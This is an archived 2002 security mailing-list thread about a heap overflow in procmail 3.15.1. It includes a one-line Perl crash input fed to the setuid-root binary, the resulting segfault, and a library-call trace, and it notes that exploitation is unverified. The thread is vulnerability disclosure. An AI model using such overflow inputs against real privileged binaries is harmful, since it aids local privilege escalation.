Re: procmail heap overflow

From: KF (dotslashat_private)
Date: Tue Jun 18 2002 - 21:46:29 PDT

  • Next message: Syzop: "Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server"

    I believe we (one of our researchers "dvdman") were messing with this a 
    few months back ... we never finished up out research ... heres what I 
    found in an old strace log...
    
    -KF
    
    
    malloc(86)                                        = 0x0805e0c0
    memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
    setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    setuid(506)                                       = 0
    setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 
    0x0805c9c8
    strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
    malloc(81)                                        = 0x0805e120
    memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
    strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0)  = 2
    memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
    strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0)  = 17
    memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
    write(2, "procmail: Exceeded LINEBUF\n", 27)      = 27
    strchr("PROCMAIL_OVERFLOW=yes", '=')              = "=yes"
    strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 
    17) = 15strncmp("PROCMAIL_OVERFLOW=yes", 
    "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 
    17 <unfinished ...>
    --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++
    
    -KF
    
    
    SpaceWalker wrote:
    
    >$ procmail -v
    >procmail v3.15.1 2001/01/08
    >$ procmail `perl -e '{print "A"x10240}'`=A
    >wait indefinitively
    >Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.
    >
    >On Wed, 19 Jun 2002 02:38:08 +0200
    >flatline <flatlineat_private> wrote:
    >
    >>hi,
    >>
    >>i found a heap overflow in procmail (up until latest) some time ago.
    >>
    >>flatline@intra:/usr/bin$ ls -la procmail
    >>-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
    >>flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
    >>procmail: Exceeded LINEBUF
    >>Segmentation fault
    >>flatline@intra:/usr/bin$
    >>
    >>at first it seemed to properly drop privs before segging, but not too long 
    >>ago i managed to make it crash while it still had euid 0.
    >>segfaults have been seen on red hat/slackware linux and bsd variants. 
    >>successful exploitation has not been verified.
    >>
    >>/ flatline
    >>
    >>greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone 
    >>who felt left out.
    >>
    >
    >
    



    This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 11:16:31 PDT